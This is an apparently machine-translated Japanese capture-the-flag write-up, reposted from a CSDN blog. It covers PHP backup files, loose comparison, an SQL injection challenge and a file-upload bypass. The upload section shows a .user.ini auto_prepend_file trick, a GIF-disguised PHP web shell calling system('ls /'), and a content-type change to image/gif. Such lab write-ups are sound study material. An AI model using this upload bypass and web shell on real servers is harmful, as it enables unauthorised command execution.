web module_2 (SQLインジェクション、アップロードファイルの権限取得)

1 タイトル説明:index.phpのバックアップファイル名をご存知ですか?

index.php的备份文件名为index.php.bak

2 トピックの説明

ここに画像の説明を挿入
PHP では、2 つの等号は弱い型の比較です。==形式を判断するのではなく、等しいかどうかを判断します。=== 形式が等しいかどうかを判断します。「0a」 == 0 は True、「1235a」は数値ではありませんが、「1235a">1234」は True です。

3 トピックの説明 GFSJ1004 (SQL インジェクション)

ここに画像の説明を挿入
このトピックには何も情報がありませんでしたが、ここで注意してください、アクセス許可をバイパスしてみてください。
ここに画像の説明を挿入
id=admin を試してみたところ、応答が得られたことがわかりました。
おそらく SQL インジェクションだと思います。
げっぷスイートを使用してパケットをキャプチャし、それらを送信します。
ここに画像の説明を挿入
ここに画像の説明を挿入
次に、SQL インジェクションを実行して
ここに画像の説明を挿入
フラグを取得してみます。

4 トピックの説明 GFSJ1005 (ファイルのアップロードを使用して権限を取得します)

ここに画像の説明を挿入
このトピックでは、ファイルをアップロードするためのインターフェイスを提供します。
アップロードできるのは画像ファイルのみで、その他のファイルはブロックされます。
ページ全体が php ファイルであり、この php ファイルは実行前に設定用の .user.ini ファイルを実行し、他の php ファイルを実行すると考えられます。次に、.user.ini ファイルを完成させます。内容は次のとおりです。

GIF89a
auto_prepend_file=1.jpg

次に、1.jpg ファイルを完成させます。

GIF89a
<?=system('ls /')?>

次に、.user.ini ファイルをアップロードしましたが、ブロックされていることがわかり、アップロードできませんでした。したがって、burp スイートを使用してパケットをキャプチャし、そのサフィックスを変更します。
ここに画像の説明を挿入
権限をバイパスするには、赤いボックスのデータ型を image/gif に変更します。
次に、ページを更新すると、.user.ini ファイルが自動的に実行されます。
現在のディレクトリ内のファイル構造を取得します。
ここに画像の説明を挿入

1.jpg のファイル内容を変更し、アップロードして再度実行します。

GIF89a
<?=system('ls /')?>

結果を次のように取得します。
ここに画像の説明を挿入

おすすめ

転載: blog.csdn.net/qq_45931661/article/details/130267199